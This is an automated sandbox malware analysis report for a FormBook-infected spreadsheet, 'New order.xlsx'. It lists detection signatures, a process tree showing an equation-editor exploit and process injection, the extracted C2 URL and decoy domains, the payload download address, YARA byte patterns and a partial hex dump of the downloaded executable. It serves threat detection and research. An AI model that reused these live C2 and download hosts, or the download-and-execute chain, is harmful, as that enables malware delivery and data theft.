Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New order.xlsx

Overview

General Information

Sample Name:New order.xlsx
Analysis ID:626188
MD5:70583aa55602c8ba0a7f85d815cb5806
SHA1:7123adf1a048a8168457dcb5aaa9fead90e40218
SHA256:4da5cb33b2f19fc2d80cafe3e9e9f1a7071d65724ea9316c86c1a635105bab44
Tags:FormbookVelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1488 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1484 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1788 cmdline: "C:\Users\Public\vbc.exe" MD5: 69250F55FBFE48822C838B4EEAF33A0A)
      • fdvucso.exe (PID: 2604 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
        • fdvucso.exe (PID: 2324 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • svchost.exe (PID: 736 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
              • cmd.exe (PID: 568 cmdline: /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.EQNEDT32.EXE.5acf30.0.raw.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
      • 0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      • 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
      6.0.fdvucso.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.fdvucso.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.fdvucso.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.EQNEDT32.EXE.5acf30.0.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
        • 0xae8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        • 0xae8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
        Click to see the 20 entries

        Sigma Signatures

        Exploits

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internet
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.33.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1484, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
        Sigma detected: File Dropped By EQNEDT32EXE
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1484, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}
        Multi AV Scanner detection for submitted file
        Source: New order.xlsxVirustotal: Detection: 40%Perma Link
        Source: New order.xlsxReversingLabs: Detection: 34%
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Antivirus detection for URL or domain
        Source: http://104.168.33.25/gtb/vbc.exeAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: http://104.168.33.25/gtb/vbc.exeVirustotal: Detection: 13%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 36%
        Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 36%
        Machine Learning detection for dropped file
        Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
        Source: 6.0.fdvucso.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 5.2.fdvucso.exe.120000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.0.fdvucso.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.0.fdvucso.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.2.fdvucso.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

        Exploits

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Office equation editor establishes network connection
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: unknown Port: 80
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: vbc.exe, 00000004.00000002.996335800.0000000000789000.00000004.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000005.00000000.977201481.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000005.00000002.985046531.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000006.00000000.980432583.000000000132E000.00000002.00000001.01000000.00000005.sdmp, svchost.exe, 00000008.00000002.1171414662.000000000023C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171982272.0000000000D2F000.00000004.10000000.00040000.00000000.sdmp, fdvucso.exe.4.dr, nsbF6CE.tmp.4.dr
        Source: Binary string: wntdll.pdb source: fdvucso.exe, fdvucso.exe, 00000006.00000003.984908261.0000000000430000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1036425899.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1035304413.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000003.986623998.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1171527322.0000000000690000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1034856361.0000000000380000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171735626.0000000000810000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1036048676.0000000000500000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: fdvucso.exe, 00000006.00000002.1035230712.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1034825185.0000000000030000.00000040.10000000.00040000.00000000.sdmp
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,

        Software Vulnerabilities

        barindex
        Shellcode detected
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036604F3 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605C1 ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660467 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0366044E ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605DF ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605AA ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660483 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0366050D URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: global trafficDNS query: name: www.insurancecentral.info
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 4x nop then pop ebx
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.33.25:80
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.33.25:80

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeDomain query: www.insurancecentral.info
        Source: C:\Windows\explorer.exeDomain query: www.xinli-ac.com
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: www.worklifefirewalls.com/m9y5/
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
        Source: global trafficHTTP traffic detected: GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1Host: www.xinli-ac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 15:21:05 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Fri, 13 May 2022 09:01:34 GMTETag: "43da0-5dee0ebd81a80"Accept-Ranges: bytesContent-Length: 277920Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /gtb/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.25Connection: Keep-Alive
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.25
